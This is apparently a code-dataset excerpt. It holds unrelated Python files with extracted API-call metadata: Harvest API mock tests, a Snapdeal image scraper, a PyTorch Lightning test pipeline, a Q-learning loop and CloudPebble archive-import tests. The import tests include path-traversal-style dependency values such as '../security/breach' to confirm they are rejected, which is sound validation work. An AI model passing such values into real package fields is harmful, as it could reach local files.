"default_hourly_rate":0.0,
"is_default":True,
"is_active":True,
"created_at":"2017-06-26T20:41:00Z",
"updated_at":"2017-06-26T21:53:34Z"
}
task_8083368_dict = {
"id":8083368,
"name":"Project Management",
"billable_by_default":True,
"default_hourly_rate":100.0,
"is_default":True,
"is_active":True,
"created_at":"2017-06-26T20:41:00Z",
"updated_at":"2017-06-26T21:14:10Z"
}
task_8083366_dict = {
"id":8083366,
"name":"Programming",
"billable_by_default":True,
"default_hourly_rate":100.0,
"is_default":True,
"is_active":True,
"created_at":"2017-06-26T20:41:00Z",
"updated_at":"2017-06-26T21:14:07Z"
}
task_8083365_dict = {
"id":8083365,
"name":"Graphic Design",
"billable_by_default":True,
"default_hourly_rate":100.0,
"is_default":True,
"is_active":True,
"created_at":"2017-06-26T20:41:00Z",
"updated_at":"2017-06-26T21:14:02Z"
}
task_8083782_dict = {
"id":8083782,
"name":"<NAME>",
"billable_by_default":True,
"default_hourly_rate":0.0, # TODO: this is supposed to be an int. Something isn't casting int to float.
"is_default":False,
"is_active":True,
"created_at":"2017-06-26T22:04:31Z",
"updated_at":"2017-06-26T22:04:31Z"
}
tasks_dict = {
"tasks":[task_8083800_dict, task_8083369_dict, task_8083368_dict, task_8083366_dict, task_8083365_dict],
"per_page":100,
"total_pages":1,
"total_entries":5,
"next_page":None,
"previous_page":None,
"page":1,
"links":{
"first":"https://api.harvestapp.com/v2/tasks?page=1&per_page=100",
"next":None,
"previous":None,
"last":"https://api.harvestapp.com/v2/tasks?page=1&per_page=100"
}
}
# tasks
httpretty.register_uri(httpretty.GET,
"https://api.harvestapp.com/api/v2/tasks?page=1&per_page=100",
body=json.dumps(tasks_dict),
status=200
)
tasks = from_dict(data_class=Tasks, data=tasks_dict)
requested_tasks = self.harvest.tasks()
self.assertEqual(requested_tasks, tasks)
# get_task
httpretty.register_uri(httpretty.GET,
"https://api.harvestapp.com/api/v2/tasks/8083800",
body=json.dumps(task_8083800_dict),
status=200
)
task = from_dict(data_class=Task, data=task_8083800_dict)
requested_task = self.harvest.get_task(task_id= 8083800)
self.assertEqual(requested_task, task)
# create_task
httpretty.register_uri(httpretty.POST,
"https://api.harvestapp.com/api/v2/tasks",
body=json.dumps(task_8083782_dict),
status=201
)
new_task = from_dict(data_class=Task, data=task_8083782_dict)
requested_new_task = self.harvest.create_task(name= "New Task Name", default_hourly_rate= 120.0) # Harvest doco is wrong. they use hourly_rate not default_hourly_rate
self.assertEqual(requested_new_task, new_task)
# update_task
task_8083782_dict["is_default"] = True
httpretty.register_uri(httpretty.PATCH,
"https://api.harvestapp.com/api/v2/tasks/8083782",
body=json.dumps(task_8083782_dict),
status=200
)
updated_task = from_dict(data_class=Task, data=task_8083782_dict)
requested_updated_task = self.harvest.update_task(task_id=8083782, is_default=True)
self.assertEqual(requested_updated_task, updated_task)
# delete_task
httpretty.register_uri(httpretty.DELETE,
"https://api.harvestapp.com/api/v2/tasks/8083782",
status=200
)
requested_deleted_task = self.harvest.delete_task(task_id=8083782)
self.assertEqual(requested_deleted_task, None)
httpretty.reset()
| [
"dacite.from_dict",
"sys.path.insert",
"httpretty.disable",
"httpretty.register_uri",
"httpretty.enable",
"json.dumps",
"harvest.Harvest",
"warnings.filterwarnings",
"httpretty.reset"
] | [((303, 342), 'sys.path.insert', 'sys.path.insert', (['(0)', "(sys.path[0] + '/..')"], {}), "(0, sys.path[0] + '/..')\n", (318, 342), False, 'import os, sys\n'), ((1596, 1671), 'harvest.Harvest', 'harvest.Harvest', (['"""https://api.harvestapp.com/api/v2"""', 'personal_access_token'], {}), "('https://api.harvestapp.com/api/v2', personal_access_token)\n", (1611, 1671), False, 'import harvest\n'), ((1680, 1766), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {'category': 'ResourceWarning', 'message': '"""unclosed.*"""'}), "('ignore', category=ResourceWarning, message=\n 'unclosed.*')\n", (1703, 1766), False, 'import warnings\n'), ((1804, 1822), 'httpretty.enable', 'httpretty.enable', ([], {}), '()\n', (1820, 1822), False, 'import httpretty\n'), ((1856, 1873), 'httpretty.reset', 'httpretty.reset', ([], {}), '()\n', (1871, 1873), False, 'import httpretty\n'), ((1882, 1901), 'httpretty.disable', 'httpretty.disable', ([], {}), '()\n', (1899, 1901), False, 'import httpretty\n'), ((5178, 5222), 'dacite.from_dict', 'from_dict', ([], {'data_class': 'Tasks', 'data': 'tasks_dict'}), '(data_class=Tasks, data=tasks_dict)\n', (5187, 5222), False, 'from dacite import from_dict\n'), ((5560, 5610), 'dacite.from_dict', 'from_dict', ([], {'data_class': 'Task', 'data': 'task_8083800_dict'}), '(data_class=Task, data=task_8083800_dict)\n', (5569, 5610), False, 'from dacite import from_dict\n'), ((5964, 6014), 'dacite.from_dict', 'from_dict', ([], {'data_class': 'Task', 'data': 'task_8083782_dict'}), '(data_class=Task, data=task_8083782_dict)\n', (5973, 6014), False, 'from dacite import from_dict\n'), ((6546, 6596), 'dacite.from_dict', 'from_dict', ([], {'data_class': 'Task', 'data': 'task_8083782_dict'}), '(data_class=Task, data=task_8083782_dict)\n', (6555, 6596), False, 'from dacite import from_dict\n'), ((6783, 6890), 'httpretty.register_uri', 'httpretty.register_uri', (['httpretty.DELETE', '"""https://api.harvestapp.com/api/v2/tasks/8083782"""'], {'status': '(200)'}), "(httpretty.DELETE,\n 'https://api.harvestapp.com/api/v2/tasks/8083782', status=200)\n", (6805, 6890), False, 'import httpretty\n'), ((7071, 7088), 'httpretty.reset', 'httpretty.reset', ([], {}), '()\n', (7086, 7088), False, 'import httpretty\n'), ((5097, 5119), 'json.dumps', 'json.dumps', (['tasks_dict'], {}), '(tasks_dict)\n', (5107, 5119), False, 'import json\n'), ((5473, 5502), 'json.dumps', 'json.dumps', (['task_8083800_dict'], {}), '(task_8083800_dict)\n', (5483, 5502), False, 'import json\n'), ((5873, 5902), 'json.dumps', 'json.dumps', (['task_8083782_dict'], {}), '(task_8083782_dict)\n', (5883, 5902), False, 'import json\n'), ((6451, 6480), 'json.dumps', 'json.dumps', (['task_8083782_dict'], {}), '(task_8083782_dict)\n', (6461, 6480), False, 'import json\n')] |
import bs4
import requests
import os
str = input()
input_str = str
str = str.replace(" ", "&20")
url = "https://www.snapdeal.com/search?keyword={}&santizedKeyword=&catId=&categoryId=0&suggested=false&vertical=&noOfResults=20&searchState=&clickSrc=go_header&lastKeyword=&prodCatId=&changeBackToAll=false&foundInAll=false&categoryIdSearched=&cityPageUrl=&categoryUrl=&url=&utmContent=&dealDetail=&sort=rlvncy".format(str)
response = requests.get(url)
soup = bs4.BeautifulSoup(response.content)
picture_element = soup.findAll('picture')
count = 0
try:
os.mkdir(input_str)
for i, picture in enumerate(picture_element):
count = i
with open('{}/{}-{}.jpg'.format(input_str, input_str, i), 'wb') as file:
try:
img_url = picture.img.attrs['src']
response = requests.get(img_url)
file.write(response.content)
except KeyError:
img_url = picture.img.attrs['data-src']
response = requests.get(img_url)
file.write(response.content)
except FileExistsError:
print("The search keyword is same to a previously searched keyword. Therefore, deleting old files.")
for f in os.listdir(input_str):
os.remove(os.path.join(input_str, f))
for i, picture in enumerate(picture_element):
count = i
with open('{}/{}-{}.jpg'.format(input_str, input_str, i), 'wb') as file:
try:
img_url = picture.img.attrs['src']
response = requests.get(img_url)
file.write(response.content)
except KeyError:
img_url = picture.img.attrs['data-src']
response = requests.get(img_url)
file.write(response.content)
print(count, "new files are saved in the newly created folder") | [
"os.listdir",
"os.path.join",
"requests.get",
"bs4.BeautifulSoup",
"os.mkdir"
] | [((432, 449), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (444, 449), False, 'import requests\n'), ((457, 492), 'bs4.BeautifulSoup', 'bs4.BeautifulSoup', (['response.content'], {}), '(response.content)\n', (474, 492), False, 'import bs4\n'), ((555, 574), 'os.mkdir', 'os.mkdir', (['input_str'], {}), '(input_str)\n', (563, 574), False, 'import os\n'), ((1207, 1228), 'os.listdir', 'os.listdir', (['input_str'], {}), '(input_str)\n', (1217, 1228), False, 'import os\n'), ((819, 840), 'requests.get', 'requests.get', (['img_url'], {}), '(img_url)\n', (831, 840), False, 'import requests\n'), ((1248, 1274), 'os.path.join', 'os.path.join', (['input_str', 'f'], {}), '(input_str, f)\n', (1260, 1274), False, 'import os\n'), ((998, 1019), 'requests.get', 'requests.get', (['img_url'], {}), '(img_url)\n', (1010, 1019), False, 'import requests\n'), ((1529, 1550), 'requests.get', 'requests.get', (['img_url'], {}), '(img_url)\n', (1541, 1550), False, 'import requests\n'), ((1708, 1729), 'requests.get', 'requests.get', (['img_url'], {}), '(img_url)\n', (1720, 1729), False, 'import requests\n')] |
"""
Slixmpp: The Slick XMPP Library
Copyright (C) 2010 <NAME>
This file is part of Slixmpp.
See the file LICENSE for copying permission.
"""
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
import asyncio
# Required for python < 3.7 to use the old ssl implementation
# and manage to do starttls as an unintended side effect
asyncio.sslproto._is_sslproto_available = lambda: False
from slixmpp.stanza import Message, Presence, Iq
from slixmpp.jid import JID, InvalidJID
from slixmpp.xmlstream.stanzabase import ET, ElementBase, register_stanza_plugin
from slixmpp.xmlstream.handler import *
from slixmpp.xmlstream import XMLStream
from slixmpp.xmlstream.matcher import *
from slixmpp.xmlstream.asyncio import asyncio, future_wrapper
from slixmpp.basexmpp import BaseXMPP
from slixmpp.clientxmpp import ClientXMPP
from slixmpp.componentxmpp import ComponentXMPP
from slixmpp.version import __version__, __version_info__
| [
"logging.NullHandler",
"logging.getLogger"
] | [((214, 235), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (233, 235), False, 'import logging\n'), ((175, 202), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (192, 202), False, 'import logging\n')] |
from collections import defaultdict
from pathlib import Path
from typing import Dict, List, Optional
import hydra
import numpy as np
import pandas as pd
from omegaconf import DictConfig, OmegaConf
from pytorch_lightning import (
Callback,
LightningDataModule,
LightningModule,
Trainer,
seed_everything,
)
from pytorch_lightning.loggers import LightningLoggerBase
from sklearn.model_selection import KFold
from src.train import PrepareTmpFile
from src.utils import utils
log = utils.get_logger(__name__)
def test(config: DictConfig, datamodule: Optional[LightningDataModule] = None) -> Optional[float]:
"""Contains training pipeline.
Instantiates all PyTorch Lightning objects from config.
Args:
config (DictConfig): Configuration composed by Hydra.
Returns:
Optional[float]: Metric score for hyperparameter optimization.
"""
# Set seed for random number generators in pytorch, numpy and python.random
if config.get("seed"):
seed_everything(config.seed, workers=True)
# Init lightning datamodule
if datamodule is None:
log.info(f"Instantiating datamodule <{config.datamodule._target_}>")
datamodule: LightningDataModule = hydra.utils.instantiate(config.datamodule)
# Init lightning model
log.info(f"Instantiating model <{config.model._target_}>")
model_cls = utils._locate(config.model._target_)
checkpoint_path: Path = Path(config.work_dir) / config.load_checkpoint
model: LightningModule = model_cls.load_from_checkpoint(checkpoint_path)
# Init lightning callbacks
callbacks: List[Callback] = []
if "callbacks" in config:
for _, cb_conf in config.callbacks.items():
if "_target_" in cb_conf:
log.info(f"Instantiating callback <{cb_conf._target_}>")
callbacks.append(hydra.utils.instantiate(cb_conf))
# Init lightning loggers
logger: List[LightningLoggerBase] = []
if "logger" in config:
for _, lg_conf in config.logger.items():
if "_target_" in lg_conf:
log.info(f"Instantiating logger <{lg_conf._target_}>")
logger.append(hydra.utils.instantiate(lg_conf))
# Init lightning trainer
log.info(f"Instantiating trainer <{config.trainer._target_}>")
trainer: Trainer = hydra.utils.instantiate(config.trainer, callbacks=callbacks, logger=logger, _convert_="partial")
# Send some parameters from config to all lightning loggers
log.info("Logging hyperparameters!")
utils.log_hyperparameters(
config=config,
model=model,
datamodule=datamodule,
trainer=trainer,
callbacks=callbacks,
logger=logger,
)
# Evaluate model on test set, using the best model achieved during training
log.info("Starting testing!")
result: List[Dict[str, float]] = trainer.test(model=model, datamodule=datamodule)
# Make sure everything closed properly
log.info("Finalizing!")
utils.finish(
config=config,
model=model,
datamodule=datamodule,
trainer=trainer,
callbacks=callbacks,
logger=logger,
)
return result
def test_cv(config: OmegaConf, df: pd.DataFrame):
# Filter run
log.debug("Filtering")
log.debug(f"Length: {len(df)}")
for name, d in [("model", config.model), ("dataset", config.datamodule), ("trainer", config.trainer)]:
for k, v in d.items():
if len(df) == 1:
break
df = df[df[f"{name}_{k}"] == v]
log.debug(f"{name}_{k}={v}")
log.debug(f"Length: {len(df)}")
index = df.index
assert len(index) == 1
run_name = index[0]
log.info(f"Run name: {run_name}")
checkpoint_paths = df.filter(regex="^best_checkpoint")
result_dict = defaultdict(list)
# Load csv
df = pd.read_csv(config.datamodule.csv_path)
kf = KFold(n_splits=config["folds"], shuffle=True, random_state=config.seed)
datamodule_params = dict(config.datamodule)
datamodule_cls = utils._locate(datamodule_params.pop("_target_"))
datamodule_params.pop("csv_path") # remove csv_path from params
for i, (checkpoint_path, (train_idx, test_idx)) in enumerate(
zip(checkpoint_paths.values[0], kf.split(df)), start=1
):
log.info(f"Start {i}th fold out of {kf.n_splits} folds")
train_df = df.iloc[train_idx]
test_df = df.iloc[test_idx]
valid_df, test_df = np.array_split(test_df, 2)
log.info(checkpoint_path)
config.load_checkpoint = checkpoint_path
# Init lightning datamodule
log.info(f"Instantiating datamodule <{config.datamodule._target_}>")
with PrepareTmpFile(train_df, valid_df, test_df) as (ft, fv, fe):
datamodule: LightningDataModule = datamodule_cls(ft.name, fv.name, fe.name, **datamodule_params)
result: List[Dict[str, float]] = test(config, datamodule)
print(result)
assert len(result) == 1
result = result[0]
for k, v in result.items():
result_dict[k].append(v)
utils.log_cv_result(run_name, config, result_dict)
| [
"src.utils.utils.get_logger",
"pandas.read_csv",
"src.utils.utils.log_cv_result",
"pathlib.Path",
"hydra.utils.instantiate",
"pytorch_lightning.seed_everything",
"src.utils.utils.log_hyperparameters",
"numpy.array_split",
"src.train.PrepareTmpFile",
"collections.defaultdict",
"src.utils.utils._l... | [((499, 525), 'src.utils.utils.get_logger', 'utils.get_logger', (['__name__'], {}), '(__name__)\n', (515, 525), False, 'from src.utils import utils\n'), ((1376, 1412), 'src.utils.utils._locate', 'utils._locate', (['config.model._target_'], {}), '(config.model._target_)\n', (1389, 1412), False, 'from src.utils import utils\n'), ((2334, 2434), 'hydra.utils.instantiate', 'hydra.utils.instantiate', (['config.trainer'], {'callbacks': 'callbacks', 'logger': 'logger', '_convert_': '"""partial"""'}), "(config.trainer, callbacks=callbacks, logger=logger,\n _convert_='partial')\n", (2357, 2434), False, 'import hydra\n'), ((2541, 2674), 'src.utils.utils.log_hyperparameters', 'utils.log_hyperparameters', ([], {'config': 'config', 'model': 'model', 'datamodule': 'datamodule', 'trainer': 'trainer', 'callbacks': 'callbacks', 'logger': 'logger'}), '(config=config, model=model, datamodule=datamodule,\n trainer=trainer, callbacks=callbacks, logger=logger)\n', (2566, 2674), False, 'from src.utils import utils\n'), ((3003, 3124), 'src.utils.utils.finish', 'utils.finish', ([], {'config': 'config', 'model': 'model', 'datamodule': 'datamodule', 'trainer': 'trainer', 'callbacks': 'callbacks', 'logger': 'logger'}), '(config=config, model=model, datamodule=datamodule, trainer=\n trainer, callbacks=callbacks, logger=logger)\n', (3015, 3124), False, 'from src.utils import utils\n'), ((3831, 3848), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3842, 3848), False, 'from collections import defaultdict\n'), ((3874, 3913), 'pandas.read_csv', 'pd.read_csv', (['config.datamodule.csv_path'], {}), '(config.datamodule.csv_path)\n', (3885, 3913), True, 'import pandas as pd\n'), ((3923, 3994), 'sklearn.model_selection.KFold', 'KFold', ([], {'n_splits': "config['folds']", 'shuffle': '(True)', 'random_state': 'config.seed'}), "(n_splits=config['folds'], shuffle=True, random_state=config.seed)\n", (3928, 3994), False, 'from sklearn.model_selection import KFold\n'), ((5121, 5171), 'src.utils.utils.log_cv_result', 'utils.log_cv_result', (['run_name', 'config', 'result_dict'], {}), '(run_name, config, result_dict)\n', (5140, 5171), False, 'from src.utils import utils\n'), ((1004, 1046), 'pytorch_lightning.seed_everything', 'seed_everything', (['config.seed'], {'workers': '(True)'}), '(config.seed, workers=True)\n', (1019, 1046), False, 'from pytorch_lightning import Callback, LightningDataModule, LightningModule, Trainer, seed_everything\n'), ((1226, 1268), 'hydra.utils.instantiate', 'hydra.utils.instantiate', (['config.datamodule'], {}), '(config.datamodule)\n', (1249, 1268), False, 'import hydra\n'), ((1441, 1462), 'pathlib.Path', 'Path', (['config.work_dir'], {}), '(config.work_dir)\n', (1445, 1462), False, 'from pathlib import Path\n'), ((4485, 4511), 'numpy.array_split', 'np.array_split', (['test_df', '(2)'], {}), '(test_df, 2)\n', (4499, 4511), True, 'import numpy as np\n'), ((4723, 4766), 'src.train.PrepareTmpFile', 'PrepareTmpFile', (['train_df', 'valid_df', 'test_df'], {}), '(train_df, valid_df, test_df)\n', (4737, 4766), False, 'from src.train import PrepareTmpFile\n'), ((1858, 1890), 'hydra.utils.instantiate', 'hydra.utils.instantiate', (['cb_conf'], {}), '(cb_conf)\n', (1881, 1890), False, 'import hydra\n'), ((2180, 2212), 'hydra.utils.instantiate', 'hydra.utils.instantiate', (['lg_conf'], {}), '(lg_conf)\n', (2203, 2212), False, 'import hydra\n')] |
from agent import Qnet
from agent import ReplayBuffer
from agent import train
q = Qnet()
q_target = Qnet()
q_target.load_state_dict(q.state_dict())
memory = ReplayBuffer()
print_interval = 20
score = 0.0
optimizer = optim.Adam(q.parameters(), lr=learning_rate)
score_history= []
for n_epi in range(3000):
epsilon = max(0.01, 0.08 - 0.01*(n_epi/200)) #Linear annealing from 8% to 1%
s = env.reset(random_init=True)
done = False
n_step =0
while not done:
n_step +=1
a = q.sample_action(torch.from_numpy(np.array(s)).float(), epsilon)
s_prime, r, done = env.transition(a)
done_mask = 0.0 if done else 1.0
memory.put((s,a,r,s_prime, done_mask))
score += r
if done:
break
s = s_prime
if memory.size()>2000:
train(q, q_target, memory, optimizer)
if n_epi%print_interval==0 and n_epi!=0:
q_target.load_state_dict(q.state_dict())
print("n_episode :{}, score : {:.1f}, n_buffer : {}, eps : {:.1f}%, n_step:{}".format(n_epi, score/print_interval, memory.size(), epsilon*100, n_step))
score_history.append(score/print_interval)
score = 0.0 | [
"agent.train",
"agent.Qnet",
"agent.ReplayBuffer"
] | [((90, 96), 'agent.Qnet', 'Qnet', ([], {}), '()\n', (94, 96), False, 'from agent import Qnet\n'), ((109, 115), 'agent.Qnet', 'Qnet', ([], {}), '()\n', (113, 115), False, 'from agent import Qnet\n'), ((168, 182), 'agent.ReplayBuffer', 'ReplayBuffer', ([], {}), '()\n', (180, 182), False, 'from agent import ReplayBuffer\n'), ((865, 902), 'agent.train', 'train', (['q', 'q_target', 'memory', 'optimizer'], {}), '(q, q_target, memory, optimizer)\n', (870, 902), False, 'from agent import train\n')] |
""" These tests check basic operation of ide.tasks.archive.do_import_archive """
import mock
from django.core.exceptions import ValidationError
from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException
from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings
from ide.models.project import Project
from utils.fakes import FakeS3
__author__ = 'joe'
fake_s3 = FakeS3()
@mock.patch('ide.models.s3file.s3', fake_s3)
class TestImportArchive(CloudpebbleTestCase):
def setUp(self):
self.login()
@staticmethod
def make_resource_spec(name='IMAGE_BLAH'):
return {
'resources': {
'media': [{
'file': 'images/blah.png',
'name': name,
'type': 'bitmap'
}]
}
}
def test_import_basic_bundle_with_appinfo(self):
""" Check that a minimal bundle imports without error """
bundle = build_bundle({
'src/main.c': '',
'appinfo.json': make_appinfo()
})
do_import_archive(self.project_id, bundle)
def test_throws_with_invalid_appinfo(self):
""" Check that appinfo validation is performed with a few invalid values """
invalid_things = [
('projectType', 'invalid'),
('sdkVersion', '1'),
('versionLabel', '01.0'),
]
for k, v in invalid_things:
bundle = build_bundle({
'src/main.c': '',
'appinfo.json': make_appinfo({k: v})
})
with self.assertRaises(ValidationError):
do_import_archive(self.project_id, bundle)
def test_import_basic_bundle_with_npm_manifest(self):
""" Check that archives with package.json can be imported """
bundle = build_bundle({
'src/main.c': '',
'package.json': make_package(package_options={'name': 'myproject'})
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(project.app_long_name, 'test')
self.assertEqual(project.app_short_name, 'myproject')
def test_import_package_with_dependencies(self):
""" Check that dependencies in a package.json file are imported into the database """
deps = {
'some_package': '3.14.15',
'another': 'http://blah.com/package.git',
}
bundle = build_bundle({
'src/main.c': '',
'package.json': make_package(package_options={
'dependencies': deps
})
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
actual_deps = {d.name: d.version for d in project.dependencies.all()}
self.assertDictEqual(actual_deps, deps)
def test_import_package_with_keywords(self):
""" Check that keywords in a package.json file are imported into the database """
keywords = ['pebbles', 'watch', 'bunnies']
bundle = build_bundle({
'src/main.c': '',
'package.json': make_package(package_options={
'keywords': keywords
})
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(set(keywords), set(project.keywords))
def test_import_appinfo_with_resources(self):
""" Check that a resource can be imported in an appinfo.json project """
bundle = build_bundle({
'src/main.c': '',
'resources/images/blah.png': 'contents!',
'appinfo.json': make_appinfo(options=self.make_resource_spec())
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(project.resources.get().variants.get().get_contents(), 'contents!')
def test_import_package_with_resources(self):
""" Check that a resource can be imported in an package.json project """
bundle = build_bundle({
'src/main.c': '',
'resources/images/blah.png': 'contents!',
'package.json': make_package(pebble_options=self.make_resource_spec())
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(project.resources.get().variants.get().get_contents(), 'contents!')
def test_throws_with_local_file_dependencies(self):
""" Throw if any dependencies reference local files """
bad_versions = [
'file:security/breach',
'/security/breach',
'./security/breach',
'../security/breach',
'~/security/breach'
]
for version in bad_versions:
bundle = build_bundle({
'src/main.c': '',
'package.json': make_package(package_options={
'dependencies': {'some_package': version}
})
})
with self.assertRaises(ValidationError):
do_import_archive(self.project_id, bundle)
def test_throws_if_sdk2_project_has_array_appkeys(self):
""" Throw when trying to import an sdk 2 project with array appkeys """
bundle = build_bundle({
'src/main.c': '',
'appinfo.json': make_appinfo(options={'appKeys': [], 'sdkVersion': '2'})
})
with self.assertRaises(ValidationError):
do_import_archive(self.project_id, bundle)
def test_invalid_resource_id(self):
""" Check that invalid characters are banned from resource IDs """
bundle = build_bundle({
'src/main.c': '',
'resources/images/blah.png': 'contents!',
'package.json': make_package(pebble_options=self.make_resource_spec("<>"))
})
with self.assertRaises(ValidationError):
do_import_archive(self.project_id, bundle)
def test_import_json_file(self):
""" Check that json files are correctly imported """
bundle = build_bundle({
'src/js/test.json': '{}',
'src/main.c': '',
'package.json': make_package()
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(project.source_files.filter(file_name='test.json').count(), 1)
def test_import_rocky(self):
""" Check that json files are correctly imported """
bundle = build_bundle({
'src/rocky/index.js': '',
'src/common/lib.js': '',
'src/pkjs/app.js': '',
'package.json': make_package(pebble_options={'projectType': 'rocky'})
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(project.source_files.filter(file_name='index.js', target='app').count(), 1)
self.assertEqual(project.source_files.filter(file_name='lib.js', target='common').count(), 1)
self.assertEqual(project.source_files.filter(file_name='app.js', target='pkjs').count(), 1)
@mock.patch('ide.models.s3file.s3', fake_s3)
class TestImportLibrary(CloudpebbleTestCase):
def setUp(self):
self.login(type='package')
def test_import_basic_library(self):
""" Try importing a basic library """
bundle = build_bundle({
'include/my-lib.h': '',
'package.json': make_package(pebble_options={'projectType': 'package'}),
'src/c/my-lib.c': '',
'src/c/my-priv.h': '',
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
files = {f.file_name: f for f in project.source_files.all()}
self.assertSetEqual(set(files.keys()), {'my-lib.h', 'my-lib.c', 'my-priv.h'})
self.assertEqual(files['my-lib.h'].target, 'public')
self.assertEqual(files['my-lib.c'].target, 'app')
self.assertEqual(files['my-priv.h'].target, 'app')
def test_import_library_with_resources(self):
""" Try importing a basic library with resources """
bundle = build_bundle({
'package.json': make_package(pebble_options={
'projectType': 'package',
'resources': {'media': [{
'type': 'bitmap',
'name': 'MY_RES1',
'file': 'res1.png'
}, {
'type': 'bitmap',
'name': 'MY_RES2',
'file': 'res2.png'
}]}
}),
'src/resources/res1.png': '',
'src/resources/res2.png': '',
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertSetEqual({f.file_name for f in project.resources.all()}, {'res1.png', 'res2.png'})
| [
"ide.tasks.archive.do_import_archive",
"mock.patch",
"utils.fakes.FakeS3",
"ide.utils.cloudpebble_test.make_package",
"ide.models.project.Project.objects.get",
"ide.utils.cloudpebble_test.make_appinfo"
] | [((447, 455), 'utils.fakes.FakeS3', 'FakeS3', ([], {}), '()\n', (453, 455), False, 'from utils.fakes import FakeS3\n'), ((459, 502), 'mock.patch', 'mock.patch', (['"""ide.models.s3file.s3"""', 'fake_s3'], {}), "('ide.models.s3file.s3', fake_s3)\n", (469, 502), False, 'import mock\n'), ((7304, 7347), 'mock.patch', 'mock.patch', (['"""ide.models.s3file.s3"""', 'fake_s3'], {}), "('ide.models.s3file.s3', fake_s3)\n", (7314, 7347), False, 'import mock\n'), ((1134, 1176), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (1151, 1176), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((2035, 2077), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (2052, 2077), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((2096, 2135), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (2115, 2135), False, 'from ide.models.project import Project\n'), ((2714, 2756), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (2731, 2756), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((2775, 2814), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (2794, 2814), False, 'from ide.models.project import Project\n'), ((3324, 3366), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (3341, 3366), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((3385, 3424), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (3404, 3424), False, 'from ide.models.project import Project\n'), ((3831, 3873), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (3848, 3873), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((3892, 3931), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (3911, 3931), False, 'from ide.models.project import Project\n'), ((4375, 4417), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (4392, 4417), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((4436, 4475), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (4455, 4475), False, 'from ide.models.project import Project\n'), ((6370, 6412), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (6387, 6412), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((6431, 6470), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (6450, 6470), False, 'from ide.models.project import Project\n'), ((6897, 6939), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (6914, 6939), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((6958, 6997), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (6977, 6997), False, 'from ide.models.project import Project\n'), ((7779, 7821), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (7796, 7821), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((7840, 7879), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (7859, 7879), False, 'from ide.models.project import Project\n'), ((8891, 8933), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (8908, 8933), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((8952, 8991), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (8971, 8991), False, 'from ide.models.project import Project\n'), ((5631, 5673), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (5648, 5673), False, 'from ide.tasks.archive import do_import_archive, 